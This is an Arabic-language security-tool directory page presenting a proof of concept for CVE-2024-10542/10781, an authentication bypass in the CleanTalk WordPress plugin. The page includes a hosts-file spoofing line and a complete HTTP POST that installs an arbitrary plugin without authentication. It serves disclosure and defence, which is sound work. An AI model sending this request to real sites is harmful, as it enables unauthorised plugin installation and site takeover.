Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10542 — الإضافة WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 معرضة لثغرة تثبيت إضافي تعسفي بدون مصادقة. | Kitploit
أدوات/GitHubGitHub/ubaydev/cve-2024-10542
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHububaydev/cve-2024-10542

CVE-2024-10542

الإضافة WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 معرضة لثغرة تثبيت إضافي تعسفي بدون مصادقة.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لثغرتي CVE-2024-10542 و CVE-2024-10781: التحقق من الهوية المعطل في إضافة الحماية من البريد العشوائي ومكافحة البريد العشوائي وجدار الحماية من CleanTalk الإصدار <= 6.43.2

إخلاء مسؤولية:

المعلومات الواردة في هذا المستند بشأن CVE-2024-10542 هي لأغراض التعلم والتعليم فقط. نحن لا نشجع أو نصرح باستخدام هذه المعلومات لأي أغراض ضارة، بما في ذلك على سبيل المثال لا الحصر الاستغلال أو العبث بالأنظمة أو غيرها من الأنشطة غير القانونية.

مقدمة:

في مشهد رقمي متزايد التعقيد، يعد ضمان أمان المواقع أمرًا بالغ الأهمية للعديد من مالكي المواقع. مؤخرًا، تم اكتشاف ثغرتين حرجتين تشكلان تهديدًا كبيرًا لمواقع ووردبريس. تؤثر هاتان الثغرتان على إضافة CleanTalk المعروفة، التي توفر الحماية من البريد العشوائي وإجراءات مكافحة البريد العشوائي وجدار الحماية. ما الذي يجعل هذا الوضع أكثر إلحاحًا؟ دعونا نتعمق أكثر! الثغرتان المسجلتان باسم CVE-2024-10542 و CVE-2024-10781 قد تسمحان للمهاجمين غير المصادق عليهم بتثبيت وتفعيل إضافات ضارة على المواقع المعرضة للخطر. وهذا لا يعرض سمعة الموقع للخطر فحسب، بل يفتح أيضًا الباب أمام المهاجمين لتنفيذ تعليمات برمجية عن بُعد. مع درجة CVSS تبلغ 9.8 من 10، من الواضح أن هاتين الثغرتين تقعان في فئة شديدة الخطورة. وفقًا لـ Wordfence، تتعلق كلتا الثغرتين بمشكلة تجاوز في التحقق من الهوية يمكن أن تسمح لفاعل خبيث بتثبيت وتفعيل إضافات عشوائية. وهذا بدوره قد يمهد الطريق لتنفيذ تعليمات برمجية عن بُعد إذا كانت الإضافة المُفعّلة تحتوي على ثغرة خاصة بها.

إثبات المفهوم (PoC):

أولاً، سيضع المستخدمون الخبيثون ملف hosts على أنظمة التشغيل الخاصة بهم:

root@kitploit:~
127.0.0.1 cleantalk.org

بعد ذلك يرسلون طلبًا مثل هذا

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

الخلاصة:

الأمن السيبراني مسؤولية مشتركة تقع على عاتق كل مالك موقع. من خلال الحفاظ على تحديث الإضافات والبقاء يقظين تجاه الثغرات المحتملة، يمكننا حماية مواقعنا من الهجمات الخبيثة. تأكد من تحديث CleanTalk إلى أحدث إصدار وقم بإجراء فحوصات دورية على الإضافات الأخرى لضمان أقصى درجات الأمان. تذكر، الخطوات الصغيرة يمكن أن تمنع كوارث كبيرة!

المراجع:

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

اشترِ لي قهوة:

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

شكر خاص إلى:

الله، محمد صلى الله عليه وسلم، mikemyers، Markdown Monster، عائلتي، وأنت؟

تنزيل الأداة